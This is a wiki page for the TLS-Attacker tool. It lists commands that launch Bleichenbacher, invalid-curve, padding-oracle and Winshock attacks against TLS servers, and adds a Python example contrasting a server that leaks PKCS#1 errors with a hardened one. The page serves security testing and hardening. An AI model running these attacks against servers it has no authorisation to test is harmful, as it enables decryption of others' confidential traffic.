Attacks

Juraj Somorovsky edited this page Apr 20, 2016 · 26 revisions

The Attacks module allows one to test for specific attacks against TLS implementations, or even to execute complete attacks and extract confidential data.

In the following, we assume the commands are executed from the Runnable folder. By default, the connection is established with localhost:4433, unless defined otherwise (using the -connect parameter).

Bleichenbacher Attack

The Bleichenbacher attack allows one to decrypt the premaster secret (and thus the TLS connection). It is applicable if the implementation responds with different error messages depending on the decrypted PKCS#1 message.

TLS-Attacker allows one to automatically send differently formatted PKCS#1 encrypted messages and observe the server behaviour:

$ java -jar target/TLS-Attacker-1.0.jar bleichenbacher

If the server responds with different error messages, it is most likely vulnerable.

Further information can be found here: http://web-in-security.blogspot.de/2014/08/old-attacks-on-new-tls-implementations.html
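
The condition described above, modelled on the server side as an added example (not TLS-Attacker code): a handler that answers each PKCS#1 formatting failure with its own alert, next to one that follows the RFC 5246 (section 7.4.7.1) countermeasure of continuing with a random premaster secret. Assumptions: RSA decryption is omitted and the handlers receive the already-decrypted block; all names, alert strings and sample blocks are constructed for illustration; only response content is modelled, not timing.

```python
import os

K, PMS_LEN, VERSION = 256, 48, b"\x03\x03"   # assumed: 2048-bit RSA block, TLS 1.2
PROBE_SECRET = b"\xff" * PMS_LEN   # secret the probing peer keyed its Finished with

def block(header=b"\x00\x02", payload=VERSION + b"\x11" * 46, sep=b"\x00"):
    pad = b"\xaa" * (K - len(header) - len(sep) - len(payload))  # non-zero padding
    return header + pad + sep + payload

VECTORS = {  # constructed decrypted blocks, one per formatting deviation
    "well_formed": block(),
    "wrong_header": block(header=b"\x00\x01"),
    "no_separator": block(sep=b"\xaa"),
    "short_secret": block(payload=VERSION + b"\x11" * 30),
    "wrong_version": block(payload=b"\x02\x02" + b"\x11" * 46),
}

def parse_pkcs1(em):
    if em[:2] != b"\x00\x02":
        raise ValueError("bad_header")
    sep = em.find(b"\x00", 2)
    if sep < 10:                      # not found (-1) or fewer than 8 padding bytes
        raise ValueError("bad_padding")
    return em[sep + 1:]

def finished_check(pms):
    return "finished" if pms == PROBE_SECRET else "alert:bad_record_mac"

def leaky_server(em):                 # before: one alert per failure reason
    try:
        pms = parse_pkcs1(em)
    except ValueError as err:
        return f"alert:{err}"
    if len(pms) != PMS_LEN or pms[:2] != VERSION:
        return "alert:bad_premaster"
    return finished_check(pms)

def hardened_server(em):              # after: every failure ends at the Finished check
    fallback = os.urandom(PMS_LEN)    # drawn before parsing, on every call
    try:
        pms = parse_pkcs1(em)
    except ValueError:
        pms = fallback
    if len(pms) != PMS_LEN or pms[:2] != VERSION:
        pms = fallback
    return finished_check(pms)

def distinguishable(server):          # True if the vectors draw differing responses
    return len({server(em) for em in VECTORS.values()}) > 1
```

distinguishable(leaky_server) is True and distinguishable(hardened_server) is False: the hardened handler gives the same answer for every block, which is the uniform behaviour the bleichenbacher test looks for.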

Invalid Curve Attack

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar elliptic_test -named_curve SECP192R1 -public_point_base_x 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -public_point_base_y 0x74749ac0967a8ff4cc54d93187602dd67eb3d22970aca2ca -premaster_secret 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -cipher TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

Padding Oracle Attack

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar padding_oracle

Winshock

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar winshock -cipher TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA -keystore ../../resources/ec256.jks -password password -alias mykey -signature 0x820428032402403284024032 -signature_length 5000